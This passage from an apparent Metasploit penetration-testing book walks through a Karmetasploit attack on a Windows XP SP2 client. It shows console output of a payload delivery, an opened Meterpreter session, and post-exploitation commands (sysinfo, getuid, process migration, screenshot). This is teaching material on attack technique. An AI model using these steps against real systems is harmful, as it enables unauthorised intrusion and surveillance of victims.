background image

184

Chapter 12

[*] Sending EXE payload to 10.0.0.100:1371...
[*] Sending stage (748032 bytes) to 10.0.0.100

 [*] Meterpreter session 1 opened (10.0.0.1:3333 -> 10.0.0.100:1438)

In this output, you can see at   that Metasploit first lets the client know 

that various popular websites are in fact located on the attacking machine. 
Then, at  , it uses JavaScript to determine the target’s operating system and 
browser, and responds at   with exploits based on that fingerprint. At   the 
client is presented with a malicious ActiveX control, resulting in the familiar 
yellow prompt bar in Internet Explorer, shown at the top of Figure 12-1. You 
can also see buried in the output at   that an exploit was launched against 
the client. After a brief period, you see at   that the exploit was successful 
and a Meterpreter session has been opened on the target PC!

Returning to 

msfconsole

, we can interact with the session that was created 

and check to see what permissions we have obtained on the target. Remember, 
when you exploit a browser it’s always a good idea to migrate your process 
out of the web browser in case it gets closed.

meterpreter > 

sessions -i 1

[*] Starting interaction with 1...
meterpreter > 

sysinfo

Computer: V-XP-SP2-BARE
OS      : Windows XP (Build 2600, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > 

getuid

Server username: V-XP-SP2-BARE\Administrator
meterpreter > 

run migrate -f

[*] Current server process: jEFiwxBKyjoHGijtP.exe (3448)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 2232
[*] New server process: notepad.exe (2232)
meterpreter > 

screenshot

Screenshot saved to: /opt/metasploit3/msf3/rkGrMLPa.jpeg
meterpreter >

Because this is a default installation of Windows XP SP2 with the very inse-

cure Internet Explorer 6 installed (both of which are highly out of date), the 
client didn’t even need to accept and install the malicious ActiveX control.

Wrapping Up

Attacks against wireless networks have been a popular topic for quite some 
time. Although this attack can take a bit of setup, imagine its success against a 
number of similarly configured clients located in a high-traffic or public area. 
This approach to attacking wireless clients is often popular because it’s easier 
than a brute force attack against a well-secured wireless infrastructure.

Now that you’ve seen how easy it is to conduct this sort of attack, you’ll 

probably think twice about using public wireless networks. Are you sure that 
the coffee shop is offering “free public Wi-Fi”? Or perhaps someone is run-
ning Karmetasploit?